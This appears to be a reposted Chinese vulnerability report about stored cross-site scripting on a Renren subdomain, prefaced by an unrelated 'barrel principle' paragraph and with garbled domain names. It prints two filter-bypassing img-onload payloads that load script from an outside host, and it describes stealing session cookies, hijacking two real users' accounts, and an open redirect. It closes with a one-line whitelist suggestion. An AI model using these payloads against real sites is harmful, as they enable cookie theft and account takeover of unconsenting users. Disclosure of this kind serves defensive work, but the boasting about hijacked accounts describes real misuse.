木桶效应
盛水的木桶是由许多块木板箍成的,盛水量也是由这些木板共同决定的。若其中一块木板很短,则此木桶的盛水量就被短板所限制。这块短板就成了这个木桶盛水量的[限制因素](或称[短板效应])。若要使此木桶盛水量增加,只有换掉短板或将短板加长才成。人们把这一规律总结为[木桶原理],或[木桶定律],又称[短板理论]。
--摘自百度君
详细说明:站点:
http://yujian.renren测试数据
此站虽说有针对用户的输入过滤,但是仍可以绕过。
多处存储跨站,可致账号被劫持
漏洞 证明:1·名称、资料、爱好处可绕过限制跨站
2·资料爱好
只要访问主页即可命中
不过,这里做了一些限制,过滤器过滤 script /onerror 等关键字,并且有字符数200的限制!
于是构造
IE
<img src="http://t.cn/h5UEoS" onload="document.getElementsByTagName('script')[2].src='http://1111测试数据'">
chrome
<img src="http://t.cn/h5UEoS" onload="var script=document.createElement('SCRIPT');script.setAttribute('src','http://1111测试数据');document.getElementsByTagName('head')[0].appendChild(script);">
绕过了此黑名单过滤器
截取的cookie:
可见人气还是很旺呐……
由此yujian.renren测试数据 的域,顺利进入到renren测试数据的域,至此主站被沦陷。
劫持2个妹子账号:
过年了再送个URL跳转:http://HdhCmsTestrenren测试数据/pages/autoLogin-ads. jsp ?mainPage=http://wooyun.org
你们是不是也意思意思-0-
修复方案: 白名单可能更好些
查看更多关于人人网分站漏洞战火燃烧至主站(利用cookies设计的详细内容...